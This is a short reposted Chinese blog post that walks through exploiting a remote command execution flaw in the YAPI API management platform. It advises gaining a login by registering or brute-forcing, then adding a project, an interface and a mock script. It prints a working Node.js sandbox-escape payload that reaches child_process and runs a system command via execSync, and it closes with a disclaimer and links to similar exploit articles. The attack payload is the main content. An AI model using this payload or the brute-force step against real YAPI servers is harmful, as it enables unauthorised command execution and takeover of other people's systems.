【實戰】YAPI系統遠程命令執行漏洞

本文轉載自查看原文 2021-07-08 18:23 558

注冊或者爆破獲取用戶登錄權限登陸系統：

添加項目：

添加接口

添加mock腳本：

payload：

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()

預覽里訪問接口

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Yapi Mock 遠程代碼執行漏洞 fastjson遠程命令執行漏洞復現【漏洞復現】Fastjson <=1.2.47遠程命令執行漏洞預警 | ThinkPHP 5.x遠程命令執行漏洞 pikachu靶場-RCE（遠程代碼、命令執行漏洞） pikachu學習——RCE（遠程命令代碼執行漏洞）漏洞復現-2.x rce-Thinkphp遠程命令執行 Supervisord遠程命令執行漏洞（CVE-2017-11610） Maccms8.x 遠程命令執行漏洞分析齊治堡壘機前台遠程命令執行漏洞